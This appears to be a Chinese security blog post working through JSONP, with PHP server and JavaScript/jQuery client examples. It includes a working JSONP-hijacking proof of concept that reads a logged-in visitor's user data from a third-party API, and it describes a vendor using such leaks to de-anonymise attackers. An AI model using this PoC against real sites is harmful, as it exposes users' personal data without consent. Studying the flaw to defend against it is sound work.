Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

JSONP 简易实验

wpadmin~April 4, 2019 /System Management

Contents

JSONP 实验

基本信息

JSONP (JSON with Padding) 是 json 的一种”使用模式”,可以让网页从别的域名(网站)那获取资料,即跨域读取数据。

服务端

http://wp.blkstone.me/jsonp.php?jsoncallback=callback_function

响应

callback_function(["customername1","customername2", "jack3"])

jsonp.php

<?php

header('Content-type: application/json');

//获取回调函数名
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);

//json数据
$json_data = '["customername1","customername2"]';

//输出jsonp格式的数据
echo $jsoncallback . "(" . $json_data . ")";

?>

客户端

基于 原始 JavaScript 的 JSONP 调用

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>JSONP 实例</title>
</head>
<body>
    <div id="divCustomers"></div>
    <script type="text/javascript">
function callbackFunction(result, methodName)
        {
            var html = '<ul>';
            for(var i = 0; i < result.length; i++)
            {
                html += '<li>' + result[i] + '</li>';
            }
            html += '</ul>';
            document.getElementById('divCustomers').innerHTML = html;
        }
</script>
<script type="text/javascript" src="http://www.runoob.com/try/ajax/jsonp.php?jsoncallback=callbackFunction"></script>
</body>
</html>

基于 jQuery 的 JSONP 调用

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>JSONP 实例</title>
    <script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script>    
</head>
<body>
<div id="divCustomers"></div>
<script>
$.getJSON("http://www.runoob.com/try/ajax/jsonp.php?jsoncallback=?", function(data) {

    var html = '<ul>';
    for(var i = 0; i < data.length; i++)
    {
        html += '<li>' + data[i] + '</li>';
    }
    html += '</ul>';

    $('#divCustomers').html(html); 
});
</script>
</body>
</html>

服务端 #2

<?php

header('Content-type: application/json');
//获取回调函数名
$jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);
//json数据
$json_data = '["customername1","customername2", "jack3"]';
//输出jsonp格式的数据
echo $jsoncallback . "(" . $json_data . ")";
echo "\n<br>\n";
foreach (getallheaders() as $name => $value) {
        echo "$name: $value\n";

?>

跨域请求

<script>
$.getJSON("http://wp.blkstone.me/jsonp.php?jsoncallback=?", function(data) {

    var html = '<ul>';
    for(var i = 0; i < data.length; i++)
    {
        html += '<li>' + data[i] + '</li>';
    }
    html += '</ul>';

    $('#divCustomers').html(html); 
});
</script>

漏洞利用实例

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>3rd Web JSONP PoC</title>
</head>
<body>
<div id="here"></div>


<script type="text/javascript">
    function forjsonptestcallback(result) {
        console.log(result);
        let html = '<table>\n' +
            '  <thead><tr><th colspan="2">User Info</th></tr></thead>\n' +
            '    <tbody>';
        for (let key in result) {
            html += '<tr><td>' + key + '</td><td>' + result[key] + '</td></tr>';

            if (key === 'data') {
                for (let subkey in result[key]) {
                    html += '<tr><td>' + subkey + '</td><td>' + result[key][subkey] + '</td></tr>';
                }
            }
        }

        let tail = '</tbody></table>'
        html += tail;
        let temp = document.getElementById('here').innerHTML;

        document.getElementById('here').innerHTML = temp + html + "<br><h1>-----------------</h1><br>";
    }
</script>

<script type="text/javascript"
        src="https://www.example.com/api/org/84/user/get?callback=forjsonptestcallback&jsonp=forjsonptestjsonp&successCallback=forjsonptestsuccessCallback&Callback=forjsonptestCallback&Jsonp=forjsonptestJsonp&cb=forjsonptestcb&jsonpCallback=forjsonptestjsonpCallback"></script>

</body>
</html>

漏洞利用案例

默安科技挖掘了大量 微博、腾讯、百度等的 JSONP 信息的跨域漏洞。将这些漏洞集成在 WAF 产品中,用于反向溯源黑客。
假如黑客在攻击受保护的网站的同时,在同一个浏览器中登录了其他社交网站的账户,即可被反向溯源。

参考资料

JSONP跨域漏洞总结
https://www.mi1k7ea.com/2019/08/20/JSONP%E8%B7%A8%E5%9F%9F%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/

Leave a Reply

Your email address will not be published. Required fields are marked *